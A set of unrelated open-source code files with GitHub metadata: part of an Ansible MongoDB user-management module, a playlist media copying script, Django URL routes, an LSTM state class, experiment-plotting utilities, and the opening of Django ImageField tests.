roles: readWriteAnyDatabase
state: present
# add a user 'oplog_reader' with read only access to the 'local' database on the replica_set 'belcher'. This is usefull for oplog access (MONGO_OPLOG_URL).
# please notice the credentials must be added to the 'admin' database because the 'local' database is not syncronized and can't receive user credentials
# To login with such user, the connection string should be MONGO_OPLOG_URL="mongodb://oplog_reader:oplog_reader_password@server1,server2/local?authSource=admin"
# This syntax requires mongodb 2.6+ and pymongo 2.5+
- mongodb_user:
login_user: root
login_password: root_password
database: admin
user: oplog_reader
password: oplog_reader_password
state: present
replica_set: belcher
roles:
- db: local
role: read
'''
import ssl as ssl_lib
import ConfigParser
from distutils.version import LooseVersion
try:
from pymongo.errors import ConnectionFailure
from pymongo.errors import OperationFailure
from pymongo import version as PyMongoVersion
from pymongo import MongoClient
except ImportError:
try: # for older PyMongo 2.2
from pymongo import Connection as MongoClient
except ImportError:
pymongo_found = False
else:
pymongo_found = True
else:
pymongo_found = True
# =========================================
# MongoDB module specific support methods.
#
def check_compatibility(module, client):
"""Check the compatibility between the driver and the database.
See: https://docs.mongodb.com/ecosystem/drivers/driver-compatibility-reference/#python-driver-compatibility
Args:
module: Ansible module.
client (cursor): Mongodb cursor on admin database.
"""
loose_srv_version = LooseVersion(client.server_info()['version'])
loose_driver_version = LooseVersion(PyMongoVersion)
if loose_srv_version >= LooseVersion('3.2') and loose_driver_version < LooseVersion('3.2'):
module.fail_json(msg=' (Note: you must use pymongo 3.2+ with MongoDB >= 3.2)')
elif loose_srv_version >= LooseVersion('3.0') and loose_driver_version <= LooseVersion('2.8'):
module.fail_json(msg=' (Note: you must use pymongo 2.8+ with MongoDB 3.0)')
elif loose_srv_version >= LooseVersion('2.6') and loose_driver_version <= LooseVersion('2.7'):
module.fail_json(msg=' (Note: you must use pymongo 2.7+ with MongoDB 2.6)')
elif LooseVersion(PyMongoVersion) <= LooseVersion('2.5'):
module.fail_json(msg=' (Note: you must be on mongodb 2.4+ and pymongo 2.5+ to use the roles param)')
def user_find(client, user, db_name):
"""Check if the user exists.
Args:
client (cursor): Mongodb cursor on admin database.
user (str): User to check.
db_name (str): User's database.
Returns:
dict: when user exists, False otherwise.
"""
for mongo_user in client["admin"].system.users.find():
if mongo_user['user'] == user:
# NOTE: there is no 'db' field in mongo 2.4.
if 'db' not in mongo_user:
return mongo_user
if mongo_user["db"] == db_name:
return mongo_user
return False
def user_add(module, client, db_name, user, password, roles):
#pymongo's user_add is a _create_or_update_user so we won't know if it was changed or updated
#without reproducing a lot of the logic in database.py of pymongo
db = client[db_name]
if roles is None:
db.add_user(user, password, False)
else:
db.add_user(user, password, None, roles=roles)
def user_remove(module, client, db_name, user):
exists = user_find(client, user, db_name)
if exists:
if module.check_mode:
module.exit_json(changed=True, user=user)
db = client[db_name]
db.remove_user(user)
else:
module.exit_json(changed=False, user=user)
def load_mongocnf():
config = ConfigParser.RawConfigParser()
mongocnf = os.path.expanduser('~/.mongodb.cnf')
try:
config.readfp(open(mongocnf))
creds = dict(
user=config.get('client', 'user'),
password=config.get('client', 'pass')
)
except (ConfigParser.NoOptionError, IOError):
return False
return creds
def check_if_roles_changed(uinfo, roles, db_name):
# We must be aware of users which can read the oplog on a replicaset
# Such users must have access to the local DB, but since this DB does not store users credentials
# and is not synchronized among replica sets, the user must be stored on the admin db
# Therefore their structure is the following :
# {
# "_id" : "admin.oplog_reader",
# "user" : "oplog_reader",
# "db" : "admin", # <-- admin DB
# "roles" : [
# {
# "role" : "read",
# "db" : "local" # <-- local DB
# }
# ]
# }
def make_sure_roles_are_a_list_of_dict(roles, db_name):
output = list()
for role in roles:
if isinstance(role, basestring):
new_role = { "role": role, "db": db_name }
output.append(new_role)
else:
output.append(role)
return output
roles_as_list_of_dict = make_sure_roles_are_a_list_of_dict(roles, db_name)
uinfo_roles = uinfo.get('roles', [])
if sorted(roles_as_list_of_dict) == sorted(uinfo_roles):
return False
return True
# =========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec = dict(
login_user=dict(default=None),
login_password=dict(default=None),
login_host=dict(default='localhost'),
login_port=dict(default='27017'),
login_database=dict(default=None),
replica_set=dict(default=None),
database=dict(required=True, aliases=['db']),
name=dict(required=True, aliases=['user']),
password=dict(aliases=['pass']),
ssl=dict(default=False, type='bool'),
roles=dict(default=None, type='list'),
state=dict(default='present', choices=['absent', 'present']),
update_password=dict(default="always", choices=["always", "on_create"]),
ssl_cert_reqs=dict(default='CERT_REQUIRED', choices=['CERT_NONE', 'CERT_OPTIONAL', 'CERT_REQUIRED']),
),
supports_check_mode=True
)
if not pymongo_found:
module.fail_json(msg='the python pymongo module is required')
login_user = module.params['login_user']
login_password = module.params['login_password']
login_host = module.params['login_host']
login_port = module.params['login_port']
login_database = module.params['login_database']
replica_set = module.params['replica_set']
db_name = module.params['database']
user = module.params['name']
password = module.params['password']
ssl = module.params['ssl']
ssl_cert_reqs = None
roles = module.params['roles'] or []
state = module.params['state']
update_password = module.params['update_password']
try:
connection_params = {
"host": login_host,
"port": int(login_port),
}
if replica_set:
connection_params["replicaset"] = replica_set
if ssl:
connection_params["ssl"] = ssl
connection_params["ssl_cert_reqs"] = getattr(ssl_lib, module.params['ssl_cert_reqs'])
client = MongoClient(**connection_params)
# NOTE: this check must be done ASAP.
# We doesn't need to be authenticated.
check_compatibility(module, client)
if login_user is None and login_password is None:
mongocnf_creds = load_mongocnf()
if mongocnf_creds is not False:
login_user = mongocnf_creds['user']
login_password = mongocnf_creds['password']
elif login_password is None or login_user is None:
module.fail_json(msg='when supplying login arguments, both login_user and login_password must be provided')
if login_user is not None and login_password is not None:
client.admin.authenticate(login_user, login_password, source=login_database)
elif LooseVersion(PyMongoVersion) >= LooseVersion('3.0'):
if db_name != "admin":
module.fail_json(msg='The localhost login exception only allows the first admin account to be created')
#else: this has to be the first admin user added
except Exception:
e = get_exception()
module.fail_json(msg='unable to connect to database: %s' % str(e))
if state == 'present':
if password is None and update_password == 'always':
module.fail_json(msg='password parameter required when adding a user unless update_password is set to on_create')
try:
uinfo = user_find(client, user, db_name)
if update_password != 'always' and uinfo:
password = None
if not check_if_roles_changed(uinfo, roles, db_name):
module.exit_json(changed=False, user=user)
if module.check_mode:
module.exit_json(changed=True, user=user)
user_add(module, client, db_name, user, password, roles)
except Exception:
e = get_exception()
module.fail_json(msg='Unable to add or update user: %s' % str(e))
# Here we can check password change if mongo provide a query for that : https://jira.mongodb.org/browse/SERVER-22848
#newuinfo = user_find(client, user, db_name)
#if uinfo['role'] == newuinfo['role'] and CheckPasswordHere:
# module.exit_json(changed=False, user=user)
elif state == 'absent':
try:
user_remove(module, client, db_name, user)
except Exception:
e = get_exception()
module.fail_json(msg='Unable to remove user: %s' % str(e))
module.exit_json(changed=True, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
if __name__ == '__main__':
main()
|
{
"content_hash": "a7a39d4b49309d88b00b3eff7702b48b",
"timestamp": "",
"source": "github",
"line_count": 433,
"max_line_length": 255,
"avg_line_length": 34.595842956120094,
"alnum_prop": 0.6214285714285714,
"repo_name": "nwiizo/workspace_2017",
"id": "7fbcf332268a67c15340205695e4b5d0b45342b2",
"size": "15791",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "ansible-modules-extras/database/misc/mongodb_user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "173"
},
{
"name": "C++",
"bytes": "7105"
},
{
"name": "CSS",
"bytes": "50021"
},
{
"name": "Go",
"bytes": "112005"
},
{
"name": "HTML",
"bytes": "66435"
},
{
"name": "JavaScript",
"bytes": "73266"
},
{
"name": "Makefile",
"bytes": "1227"
},
{
"name": "PHP",
"bytes": "3916"
},
{
"name": "PowerShell",
"bytes": "277598"
},
{
"name": "Python",
"bytes": "11925958"
},
{
"name": "Ruby",
"bytes": "3779"
},
{
"name": "Rust",
"bytes": "1484076"
},
{
"name": "Shell",
"bytes": "86558"
}
],
"symlink_target": ""
}
|
"""
#
# By: Charles Brandt [code at charlesbrandt dot com]
# On: *2013.06.05
# License: MIT
# Requires:
# medley, moments
# Description:
#
# be sure to edit source_root and destination_root before running, then run:
cd ~/public/repos/medley/scripts
python copy_playlist_media.py /media/path/to.m3u
copy_media(source, source_root, destination_root)
useful to use:
afterwards to update the original playlist to the new location:
python /c/medley/scripts/filter_m3u_path.py /media/path/to.m3u /media/previous/base/:/media/new/base/
"""
from __future__ import print_function
from builtins import str
import os, sys, codecs
import re, shutil
from medley.formats import M3U
from sortable.path import Path
def usage():
print(__doc__)
def copy_media(source, source_root, destination_root):
m3u = M3U(source)
print("Source root:", source_root)
print("Destination root:", destination_root)
total_size = 0
total_items = 0
for item in m3u:
full_path = os.path.join(item.path, item.filename)
print("")
print("Starting:", str(full_path))
if re.match(str(source_root), str(full_path)):
p = Path(full_path)
relative = p.to_relative(source_root)
print("relative pre:", relative)
sparent = p.parent()
destination = os.path.join(destination_root, relative)
dpath = Path(destination)
dparent = dpath.parent()
print("relative post:", relative)
print(sparent)
print(destination)
if not os.path.exists(str(dparent)):
os.makedirs(str(dparent))
if not os.path.exists(destination):
p.copy(destination)
else:
print("already have: %s" % destination)
for option in os.listdir(str(sparent)):
soption = os.path.join(str(sparent), option)
spath = Path(soption)
print(spath.type())
if spath.type() != "Movie" and spath.type() != "Directory":
doption = os.path.join(str(dparent), option)
if not os.path.exists(doption):
print("copy here: %s, to %s" % (soption, doption))
shutil.copy(soption, doption)
print()
def main():
#this is used to distinguish actual media from markers
source_root = '/media/source/'
destination_root = '/media/destination'
#requires that at least one argument is passed in to the script itself
#(through sys.argv)
if len(sys.argv) > 1:
helps = ['--help', 'help', '-h']
for i in helps:
if i in sys.argv:
usage()
exit()
source = sys.argv[1]
if len(sys.argv) > 2:
source_root = sys.argv[2]
destination_root = sys.argv[3]
copy_media(source, source_root, destination_root)
else:
usage()
exit()
if __name__ == '__main__':
main()
|
{
"content_hash": "cf7b2e79b4d954cedf2a0906d1f4fe8a",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 101,
"avg_line_length": 28.546296296296298,
"alnum_prop": 0.5676289328576062,
"repo_name": "charlesbrandt/medley",
"id": "915eab8937b0a5134821cb7bcedea34238d18cda",
"size": "3105",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/copy_playlist_media.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19670"
},
{
"name": "JavaScript",
"bytes": "356728"
},
{
"name": "Python",
"bytes": "1017664"
},
{
"name": "Shell",
"bytes": "1569"
},
{
"name": "Smarty",
"bytes": "40284"
}
],
"symlink_target": ""
}
|
"""Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf.urls import patterns, include, url
from django.conf import settings
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^api/(?P<apikey>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/runplugin',
'webservice.api.run_plugin'),
url(r'^api/(?P<apikey>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/getallplugins',
'webservice.api.get_all_plugins'),
)
urlpatterns += patterns('',
url(r'^$', 'webservice.views.plugin_views.view_all_plugins'),
url(r'^login/$', 'webservice.views.auth_views.login_user'),
url(r'^logout/$', 'webservice.views.auth_views.logout_user'),
)
urlpatterns += patterns('',
url(r'^plugins/$', 'webservice.views.plugin_views.view_all_plugins'),
url(r'^plugins/add/$', 'webservice.views.plugin_views.add_new_plugin'),
url(r'^plugins/edit/(?P<plugin_id>\d+)/$', 'webservice.views.plugin_views.edit_plugin'),
)
urlpatterns += patterns('',
url(r'^apikeys/$', 'webservice.views.apikey_views.view_all_apikeys'),
url(r'^apikeys/add/$', 'webservice.views.apikey_views.add_new_key'),
url(r'^apikeys/edit/(?P<apikey_id>\d+)/$', 'webservice.views.apikey_views.edit_key'),
)
urlpatterns += patterns('',
url(r'^users/$', 'webservice.views.user_views.view_all_users'),
url(r'^users/create/$', 'webservice.views.user_views.create_user'),
url(r'^users/edit/(?P<user_id>\d+)/$', 'webservice.views.user_views.edit_user'),
url(r'^users/toggle/$', 'webservice.views.user_views.toggle_user'),
url(r'^users/view/(?P<user_id>\d+)/$', 'webservice.views.user_views.view_single_user'),
)
urlpatterns += patterns('',
url(r'^content/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.STATIC_FILES}),)
|
{
"content_hash": "ec886748cfc14cb7e1feb33c7ed36195",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 122,
"avg_line_length": 49.68333333333333,
"alnum_prop": 0.5585374035558538,
"repo_name": "CitoEngine/cito_plugin_server",
"id": "4fcdc20b6d0515c372e263aeac9d5fcadc5f2427",
"size": "2981",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cito_plugin_server/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "51274"
},
{
"name": "HTML",
"bytes": "22568"
},
{
"name": "JavaScript",
"bytes": "75416"
},
{
"name": "Python",
"bytes": "49561"
},
{
"name": "Shell",
"bytes": "1218"
}
],
"symlink_target": ""
}
|
import numpy as np
class LSTM_state:
''' Class holding all the states of LSTM unit '''
def __init__(self, input_dim, output_dim, num_mem_cells):
'''At time t=0 initialize the states to zeros'''
self.xc = np.zeros(input_dim)
self.g = np.zeros(num_mem_cells)
self.i = np.zeros(num_mem_cells)
self.f = np.zeros(num_mem_cells)
self.o = np.zeros(num_mem_cells)
self.s = np.zeros(num_mem_cells)
self.h = np.zeros(num_mem_cells)
self.y = np.zeros(output_dim)
self.prob = np.zeros(output_dim)
|
{
"content_hash": "8e26f71c6d731a5aac33214d37a63051",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 61,
"avg_line_length": 32.05555555555556,
"alnum_prop": 0.5892547660311959,
"repo_name": "nrupatunga/multi-layer-lstm",
"id": "4bb5ab6797880dfb0421ed6d67f9d4c4f3c08a17",
"size": "577",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lstm/state.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19834"
}
],
"symlink_target": ""
}
|
import argparse
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from collections import defaultdict
sns.set(style="darkgrid")
import scipy as sp
import scipy.stats
def collect_experiment_data(source='/', runs=1, servers=1, agents=3,hfo=True):
# load all agent data
evalGoalPercentages = defaultdict(list)
evalGoalTimes = defaultdict(list)
evalUsedBudgets = defaultdict(list)
evalSteps = defaultdict(list)
evalTrials = np.array([])
'''
trainTrials = np.array([])
trainFrames = defaultdict(list)
trainScores = defaultdict(list)
trainUsedBudgets = defaultdict(list)
'''
goodRuns = 0
for server in range(servers):
for agent in range(1, agents+1):
for run in range(0, runs):
evalFile = os.path.join(source, "_"+ str(server) +"_"+ str(run+1) +"_AGENT_"+ str(agent) +"_RESULTS_eval")
#print evalFile
if os.path.isfile(evalFile):
if(hfo): #HFO experiment
try:
_et, _egp, _egt, _eub = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
except:
continue
if sum(evalTrials)==0:
evalTrials = _et
#print(sum(_eub.shape), sum(evalTrials.shape))
if sum(_eub.shape) == sum(evalTrials.shape):
goodRuns += 1
for trial in _et:
evalGoalPercentages[(agent,trial)].append(_egp)
evalGoalTimes[(agent,trial)].append(_egt)
evalUsedBudgets[(agent,trial)].append(_eub)
else:
print("Error " + str(run+1) + " - "+ str(sum(_eub.shape))+" , "+str(sum(evalTrials.shape)))
else:
try:
_et, _es, _eub = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
except:
continue
if sum(evalTrials)==0:
evalTrials = _et
#print(sum(_eub.shape), sum(evalTrials.shape))
if sum(_eub.shape) == sum(evalTrials.shape):
goodRuns += 1
for trial in _et:
evalSteps[(agent,trial)].append(_es)
evalUsedBudgets[(agent,trial)].append(_eub)
else:
print("Error " + str(run+1) + " - "+ str(sum(_eub.shape))+" , "+str(sum(evalTrials.shape)))
goodRuns = int(goodRuns / agents)
print('Could use %d runs from expected %d' % (goodRuns, runs))
'''
trainFile = os.path.join(source, "_"+ str(run) +"_"+ str(server) +"_AGENT_"+ str(agent) +"_RESULTS_train")
print trainFile
_tt, _tf, _ts, _tub = np.loadtxt(open(trainFile, "rb"), skiprows=1, delimiter=",", unpack=True)
if sum(trainTrials)==0:
trainTrials = _tt
for trial in _tt:
trainFrames[(agent,trial)].append(_tf)
trainScores[(agent,trial)].append(_ts)
trainUsedBudgets[(agent,trial)].append(_tub)
for agent in range(1, agents+1):
for trial in evalTrials:
# build summaries
evalGoalPercentages[(agent,trial)] = [summarize_data(evalGoalPercentages[(agent,trial)])]
evalGoalTimes[(agent,trial)] = [summarize_data(evalGoalTimes[(agent,trial)])]
evalUsedBudgets[(agent,trial)] = [summarize_data(evalUsedBudgets[(agent,trial)])]
for trial in trainTrials:
# build summaries
trainFrames[(agent,trial)] = [summarize_data(trainFrames[(agent,trial)])]
trainScores[(agent,trial)] = [summarize_data(trainScores[(agent,trial)])]
trainUsedBudgets[(agent,trial)] = [summarize_data(trainUsedBudgets[(agent,trial)])]
'''
#print('len(evalGoalPercentages) %d --> %s %s' % (len(evalGoalPercentages), str(type(evalGoalPercentages[(1,20)])), str(evalGoalPercentages[(1,20)]) ))
#print('len(evalGoalTimes) %d --> %s %s' % (len(evalGoalTimes), str(type(evalGoalTimes[(1,20)])), str(evalGoalTimes[(1,20)]) ))
print('len(evalUsedBudgets) %d --> %s %s' % (len(evalUsedBudgets), str(type(evalUsedBudgets[(1,20)])), str(len(evalUsedBudgets[(1,10)])) ))
headerLine = []
headerLine.append("Trial")
for run in range(1, runs+1):
headerLine.append("Run"+str(run))
if(hfo):
with open(os.path.join(source, "__EVAL_goalpercentages"), 'wb') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow((headerLine))
csvfile.flush()
for i in range(sum(evalTrials.shape)):
newrow = [evalTrials[i]]
for j in evalGoalPercentages[(1,evalTrials[i])]:
newrow.append("{:.2f}".format(j[i]))
csvwriter.writerow((newrow))
csvfile.flush()
with open(os.path.join(source, "__EVAL_goaltimes"), 'wb') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow((headerLine))
csvfile.flush()
for i in range(sum(evalTrials.shape)):
newrow = [evalTrials[i]]
for j in evalGoalTimes[(1,evalTrials[i])]:
newrow.append("{:.2f}".format(j[i]))
csvwriter.writerow((newrow))
csvfile.flush()
else:
with open(os.path.join(source, "__EVAL_stepscaptured"), 'wb') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow((headerLine))
csvfile.flush()
for i in range(sum(evalTrials.shape)):
newrow = [evalTrials[i]]
for j in evalSteps[(1,evalTrials[i])]:
newrow.append("{:.2f}".format(j[i]))
csvwriter.writerow((newrow))
csvfile.flush()
with open(os.path.join(source, "__EVAL_budgets"), 'wb') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow((headerLine))
csvfile.flush()
allBudgets = []
for trial in range(sum(evalTrials.shape)):
budgetAvg = [0]* (goodRuns)
for agent in range(1,agents+1):
for i in range(len(evalUsedBudgets[(agent,evalTrials[trial])])):
#try:
budgetAvg[i] += evalUsedBudgets[(agent,evalTrials[trial])][i]/agents
#except:
# print i, len(evalUsedBudgets[(agent,evalTrials[trial])])
allBudgets.append(budgetAvg)
for i in range(sum(evalTrials.shape)):
newrow = [evalTrials[i]]
#print allBudgets[i]
for j in allBudgets[i]:
#print(i,j[i])
newrow.append("{:.2f}".format(j[i]))
csvwriter.writerow((newrow))
csvfile.flush()
def summarize_data(data, confidence=0.95):
n = len(data)
m = np.mean(data,axis=0)
se = scipy.stats.sem(data,axis=0)
h = se * sp.stats.t._ppf((1+confidence)/2., n-1)
return np.asarray([m, m-h, m+h])
def summarize_experiment_data(source,hfo=True):
if hfo:
values = ["__EVAL_goalpercentages", "__EVAL_goaltimes", "__EVAL_budgets"]
else:
values = ["__EVAL_stepscaptured", "__EVAL_budgets"]
#values = ["__EVAL_goalpercentages", "__EVAL_goaltimes"]
for value in values:
evalFile = os.path.join(source, value)
#print(evalFile)
evalFileContent = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
trials = evalFileContent[0]
data = evalFileContent[1:]
update = summarize_data(data)
headerLine = []
headerLine.append("trial")
headerLine.append("mean")
headerLine.append("ci_down")
headerLine.append("ci_up")
value = value.replace("EVAL","SUMMARY")
with open(os.path.join(source, value), 'wb') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow((headerLine))
csvfile.flush()
for i in range(sum(trials.shape)):
newrow = [trials[i]]
for j in update.T[i]:
newrow.append("{:.2f}".format(j))
csvwriter.writerow((newrow))
csvfile.flush()
def draw_graph(source1 = None, name1 = "Algo1",
source2 = None, name2 = "Algo2",
source3 = None, name3 = "Algo3",
source4 = None, name4 = "Algo4",
source5 = None, name5 = "Algo5",
source6 = None, name6 = "Algo5",
what = "__SUMMARY_goalpercentages", ci = True,
#Parameters introduced to allow plot control
xMin = None, xMax = None, yMin=None, yMax=None
):
plt.figure(figsize=(20,6), dpi=300)
if source1 != None:
summary1File = os.path.join(source1, what)
summary1Content = np.loadtxt(open(summary1File, "rb"), skiprows=1, delimiter=",", unpack=True)
X1 = summary1Content[0]
Y11, Y12, Y13 = summary1Content[1],summary1Content[2],summary1Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X1, Y11, Y12, facecolor='blue', alpha=0.2)
plt.fill_between(X1, Y11, Y13, facecolor='blue', alpha=0.2)
plt.plot(X1,Y11,label=name1, color='blue', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if source2 != None:
summary2File = os.path.join(source2, what)
summary2Content = np.loadtxt(open(summary2File, "rb"), skiprows=1, delimiter=",", unpack=True)
X2 = summary2Content[0]
Y21, Y22, Y23 = summary2Content[1],summary2Content[2],summary2Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X2, Y21, Y22, facecolor='green', alpha=0.2)
plt.fill_between(X2, Y21, Y23, facecolor='green', alpha=0.2)
plt.plot(X2,Y21,label=name2, color='green', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if source3 != None:
summary3File = os.path.join(source3, what)
summary3Content = np.loadtxt(open(summary3File, "rb"), skiprows=1, delimiter=",", unpack=True)
X3 = summary3Content[0]
Y31, Y32, Y33 = summary3Content[1],summary3Content[2],summary3Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X3, Y31, Y32, facecolor='red', alpha=0.2)
plt.fill_between(X3, Y31, Y33, facecolor='red', alpha=0.2)
plt.plot(X3,Y31,label=name3, color='red', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if source4 != None:
summary4File = os.path.join(source4, what)
summary4Content = np.loadtxt(open(summary4File, "rb"), skiprows=1, delimiter=",", unpack=True)
X4 = summary4Content[0]
Y41, Y42, Y43 = summary4Content[1],summary4Content[2],summary4Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X4, Y41, Y42, facecolor='yellow', alpha=0.2)
plt.fill_between(X4, Y41, Y43, facecolor='yellow', alpha=0.2)
plt.plot(X4,Y41,label=name4, color='yellow', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if source5 != None:
summary5File = os.path.join(source5, what)
summary5Content = np.loadtxt(open(summary5File, "rb"), skiprows=1, delimiter=",", unpack=True)
X5 = summary5Content[0]
Y51, Y52, Y53 = summary5Content[1],summary5Content[2],summary5Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X5, Y51, Y52, facecolor='black', alpha=0.2)
plt.fill_between(X5, Y51, Y53, facecolor='black', alpha=0.2)
plt.plot(X5,Y51,label=name5, color='black', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if source6 != None:
summary6File = os.path.join(source6, what)
summary6Content = np.loadtxt(open(summary6File, "rb"), skiprows=1, delimiter=",", unpack=True)
X6 = summary6Content[0]
Y61, Y62, Y63 = summary6Content[1],summary6Content[2],summary6Content[3]
if what != "__SUMMARY_budgets" and ci:
plt.fill_between(X6, Y61, Y62, facecolor='black', alpha=0.2)
plt.fill_between(X6, Y61, Y63, facecolor='black', alpha=0.2)
plt.plot(X6,Y61,label=name6, color='#999999', linewidth=4.0)
if not yMin is None:
plt.ylim([yMin,yMax])
if not xMin is None:
plt.xlim([xMin,xMax])
if what == "__SUMMARY_goalpercentages":
#plt.title('Goal Percentage per Trial')
plt.ylabel('Goal %', fontsize=20, fontweight='bold')
elif what == "__SUMMARY_goaltimes":
#plt.title('Average Frames to Goal per Trial')
plt.ylabel('Frames', fontsize=20, fontweight='bold')
elif what == "__SUMMARY_budgets":
#plt.title('Used Budget per Trial')
plt.ylabel('Budget', fontsize=20, fontweight='bold')
elif what == "__SUMMARY_stepscaptured":
#plt.title('Used Budget per Trial')
plt.ylabel('Steps until captured', fontsize=20, fontweight='bold')
else:
#plt.title('Unknown')
plt.ylabel('Unknown')
plt.xlabel('Training Episodes', fontsize=20, fontweight='bold')
plt.legend(loc='middle right',prop={'size':18, 'weight':'bold'})
plt.tick_params(axis='both', which='major', labelsize=18)
plt.show()
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-s','--source',default='/home/ruben/playground/HFO/experiments/EVAL/2016_09_12-14.38.02_SARSA_1_5')
parser.add_argument('-r','--runs',type=int, default=5)
return parser.parse_args()
def main():
parameter = get_args()
collect_experiment_data(parameter.source, runs = parameter.runs)
summarize_experiment_data(parameter.source)
#draw_graph(source1=parameter.source)
#draw_graph(source1=parameter.source, what="__SUMMARY_goaltimes")
#draw_graph(source1=parameter.source, what="__SUMMARY_budgets")
if __name__ == '__main__':
main()
|
{
"content_hash": "24bb107636f633614cb165b88ab8b4f8",
"timestamp": "",
"source": "github",
"line_count": 332,
"max_line_length": 155,
"avg_line_length": 44.96686746987952,
"alnum_prop": 0.5558979168062161,
"repo_name": "cowhi/HFO",
"id": "a7c92168310182bf54c6c23d51c0651f58b81f35",
"size": "14929",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "experiments/exp_utils.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1230076"
},
{
"name": "CMake",
"bytes": "8931"
},
{
"name": "Jupyter Notebook",
"bytes": "1684588"
},
{
"name": "Makefile",
"bytes": "7718"
},
{
"name": "Python",
"bytes": "218145"
},
{
"name": "Shell",
"bytes": "41259"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import os
import shutil
from unittest import skipIf
from django.core.exceptions import ImproperlyConfigured
from django.core.files import File
from django.core.files.images import ImageFile
from django.test import TestCase
from django.test.testcases import SerializeMixin
from django.utils._os import upath
try:
from .models import Image
except ImproperlyConfigured:
Image = None
if Image:
from .models import (
Person, PersonWithHeight, PersonWithHeightAndWidth,
PersonDimensionsFirst, PersonTwoImages, TestImageFieldFile,
)
from .models import temp_storage_dir
else:
# Pillow not available, create dummy classes (tests will be skipped anyway)
class Person():
pass
PersonWithHeight = PersonWithHeightAndWidth = PersonDimensionsFirst = Person
PersonTwoImages = Person
class ImageFieldTestMixin(SerializeMixin):
"""
Mixin class to provide common functionality to ImageField test classes.
"""
lockfile = __file__
# Person model to use for tests.
PersonModel = PersonWithHeightAndWidth
# File class to use for file instances.
File = ImageFile
def setUp(self):
"""
Creates a pristine temp directory (or deletes and recreates if it
already exists) that the model uses as its storage directory.
Sets up two ImageFile instances for use in tests.
"""
if os.path.exists(temp_storage_dir):
shutil.rmtree(temp_storage_dir)
os.mkdir(temp_storage_dir)
file_path1 = os.path.join(os.path.dirname(upath(__file__)), "4x8.png")
self.file1 = self.File(open(file_path1, 'rb'))
file_path2 = os.path.join(os.path.dirname(upath(__file__)), "8x4.png")
self.file2 = self.File(open(file_path2, 'rb'))
def tearDown(self):
"""
Removes temp directory and all its contents.
"""
self.file1.close()
self.file2.close()
shutil.rmtree(temp_storage_dir)
def check_dimensions(self, instance, width, height,
field_name='mugshot'):
"""
Asserts that the given width and height values match both the
field's height and width attributes and the height and width fields
(if defined) the image field is caching to.
Note, this method will check for dimension fields named by adding
"_width" or "_height" to the name of the ImageField. So, the
models used in these tests must have their fields named
accordingly.
By default, we check the field named "mugshot", but this can be
specified by passing the field_name parameter.
"""
field = getattr(instance, field_name)
# Check height/width attributes of field.
if width is None and height is None:
with self.assertRaises(ValueError):
getattr(field, 'width')
with self.assertRaises(ValueError):
getattr(field, 'height')
else:
self.assertEqual(field.width, width)
self.assertEqual(field.height, height)
# Check height/width fields of model, if defined.
width_field_name = field_name + '_width'
if hasattr(instance, width_field_name):
self.assertEqual(getattr(instance, width_field_name), width)
height_field_name = field_name + '_height'
if hasattr(instance, height_field_name):
self.assertEqual(getattr(instance, height_field_name), height)
@skipIf(Image is None, "Pillow is required to test ImageField")
